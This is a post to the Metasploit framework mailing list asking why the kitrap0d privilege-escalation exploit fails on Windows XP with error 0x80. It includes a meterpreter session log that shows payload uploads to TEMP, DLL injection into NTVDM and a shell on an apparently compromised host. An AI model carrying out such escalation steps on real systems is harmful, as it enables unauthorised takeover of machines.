kitrap0d - failing on XP 0x80

[troy () defendit com au]

Hi all,

kitrap0d is failing against windows XP 5.1.2600 with:

The exploit thread returned an unexpected error, 0x80

Has anybody seen this? work arounds?

meterpreter > run kitrap0d
[*] Currently running as PC\IWAM_PC

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\WINDOWS\TEMP\JwMZeiWrLM.exe...
[*] Uploading vdmallowed to C:\WINDOWS\TEMP\vdmexploit.dll...
[*] Escalating our process (PID:396)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso () sdf lonestar org ---


[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntoskrnl.exe@804D4000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x3bd0c bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 2008
[?] OpenProcess(2008) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d8, INFINITE);
[?] GetExitCodeThread(0x7d8, 0012FF44); => 0x80
[!] The exploit thread returned an unexpected error, 0x80

[*] Deleting files...
[*] Now running as PC\IWAM_PC


meterpreter > shell
Process 336 created.
Channel 7 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Thanks!!


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework